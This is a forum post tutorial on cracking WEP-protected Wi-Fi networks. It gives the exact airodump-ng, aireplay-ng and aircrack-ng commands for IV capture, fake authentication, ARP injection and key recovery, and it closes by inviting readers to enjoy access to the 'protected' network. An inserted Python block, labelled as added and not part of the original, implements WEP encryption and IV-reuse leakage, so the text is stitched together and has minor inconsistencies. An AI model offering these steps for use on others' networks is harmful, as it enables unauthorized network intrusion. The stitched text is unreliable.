Posts : 94 Points : 5628 Join date : 2009-12-26 Age : 34 Location : Malaysia
Subject: Cracking WEP Thu Dec 31, 2009 4:14 am
This tutorial was made using Backtrack 3, a Linux live CD.
Following this tutorial word for word will only work on Linux; it's recommended you download and burn Backtrack to a disc. Backtrack includes everything you need.
Pre-requisites:
* Kismet - Kismet is a wireless network detector and also a packet sniffer
* airmon - This tool can set your wireless network adapter into monitor mode
* iwconfig - This tool configures your wireless network adapters. It can also show whether your adapter is in monitor mode or not.
* macchanger - This tool lets you spoof your MAC (Media Access Control) address
* airodump - airodump captures packets from the target AP (Access Point, wireless router)
* aireplay - aireplay creates ARP requests used to get IVs from an AP
* aircrack - aircrack recovers WEP keys from captured IVs
OR
* backtrack (2, beta 3) - Linux live CD, includes everything needed
What we're going to do here today is crack a WEP (Wired Equivalent Privacy) secured network. This is done by faking authentication with the router and acquiring specialized packets called IVs (Initialization Vectors) that are used to crack the WEP key. It usually takes around 20,000 IVs for a successful crack, but this depends on the level of encryption (40-128 bit) and the strength of the key. 128-bit is the most secure, but of course they can all be cracked; it only changes the time required.
WEP uses the stream cipher RC4 for encryption and the CRC-32 checksum for integrity. Standard 64-bit WEP uses a 40-bit key, which is prepended with a 24-bit IV to form the RC4 key. A 128-bit key is usually a string of 26 hex characters, each representing 4 bits, giving 104 bits, plus the 24-bit IV. The same goes for a 256-bit WEP key: it is entered as 58 hex characters of 4 bits each, giving 232 bits of key material.
Now that you have a general background of WEP encryption, you're ready to move on to the actual cracking of this encryption.
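To make the construction above concrete, here is an added example (not from the original post) that builds WEP-style frames exactly as described: RC4 keyed with IV || secret key, a CRC-32 ICV appended to the payload, and the IV sent in the clear. It also shows why the 24-bit IV is the weak point: when an IV repeats under the same key, the keystream repeats, and the XOR of two ciphertexts leaks the XOR of their plaintexts without the key. The key, IV and payloads are constructed sample values.

```python
import struct
import zlib

IV_SPACE = 2 ** 24  # only ~16.7 million IVs exist; a busy AP cycles through them quickly


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA followed by PRGA); returns n keystream bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Per-frame RC4 key is IV || secret key (40- or 104-bit). The body is
    payload || CRC-32 ICV, XORed with the keystream. Returns iv || ciphertext
    (the key-id byte is omitted for brevity)."""
    assert len(iv) == 3 and len(key) in (5, 13)
    body = payload + struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    ks = rc4_keystream(iv + key, len(body))
    return iv + bytes(b ^ k for b, k in zip(body, ks))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Recover the payload and verify the ICV (which is only a CRC, not a MAC)."""
    iv, ct = frame[:3], frame[3:]
    body = bytes(b ^ k for b, k in zip(ct, rc4_keystream(iv + key, len(ct))))
    payload, icv = body[:-4], body[-4:]
    if struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF) != icv:
        raise ValueError("ICV mismatch")
    return payload


def plaintext_xor_from_iv_reuse(key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """Two frames encrypted under the same IV share a keystream, so
    c1 XOR c2 == p1 XOR p2 over the common length; no key needed."""
    c1 = wep_encrypt(key, iv, p1)[3:]
    c2 = wep_encrypt(key, iv, p2)[3:]
    n = min(len(p1), len(p2))
    return bytes(a ^ b for a, b in zip(c1[:n], c2[:n]))
```

This is the property that makes IV collection worthwhile for an attacker and is why WPA2/WPA3 replaced WEP; the only real mitigation is to stop using WEP.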
Open up Kismet and enable monitor mode on your device (ex: eth1). Now run iwconfig to check that you have selected the right target network.
Now run airodump to start collecting data while we make certain changes (ex):
airodump-ng eth1 -w /mnt/hda1/home/evox/(*filename*) --channel 4 --ivs
* eth1 is the network adapter (may be different)
* -w tells airodump to write the data to the following file (/mnt/hda1/home/evox/*.ivs)
* --channel 4 is the channel we are connecting through; replace with the channel of the target AP
* --ivs tells airodump to only collect IVs
Now we're going to fake authentication with aireplay.
aireplay-ng -1 0 -e *ESSID* -a *BSSID (MAC)* -h *ADAPTER MAC* eth1
* -1 is the type of attack; in this case, we're faking authentication with the AP
* 0 stands for the delay between attacks
* -e *ESSID*: replace *ESSID* with the ESSID (broadcast name) of your target AP
* -a *BSSID*: replace *BSSID* with the MAC address of the AP
* -h *ADAPTER MAC*: replace *ADAPTER MAC* with the MAC address of your wireless adapter; this can be viewed using macchanger (ex: macchanger -s eth1)
* eth1 is the wireless adapter
Now that we've faked authentication with the AP, we need to start injecting packets with aireplay.
aireplay-ng -3 -b *BSSID (MAC)* -h *ADAPTER MAC* eth1
* -3 is the type of attack we are initiating; in this case, packet injection (ARP request forging)
If you get a deauth/disassoc packet, re-fake authentication with the AP using aireplay as mentioned before.
When you start getting a boatload of ARP packets (receiving and transmitting), wait a little while (it took me 2 minutes), and then go to the following step.
Now we're going to crack the IVs that we captured using airodump, with aircrack.
aircrack-ng -s /mnt/hda1/evox/*.ivs
* replace '*' with what you named the file in the first step
If you collected around 20,000 IVs, you should definitely have enough; just sit back and wait for aircrack to crack the WEP key. When it's done, write down the WEP key, and enjoy your access to the 'protected' network!
If you didn't have enough IVs, keep using airodump to collect IVs, and aireplay to get more ARP requests.
If I missed anything, or wrote something wrong, please tell me. Enjoy!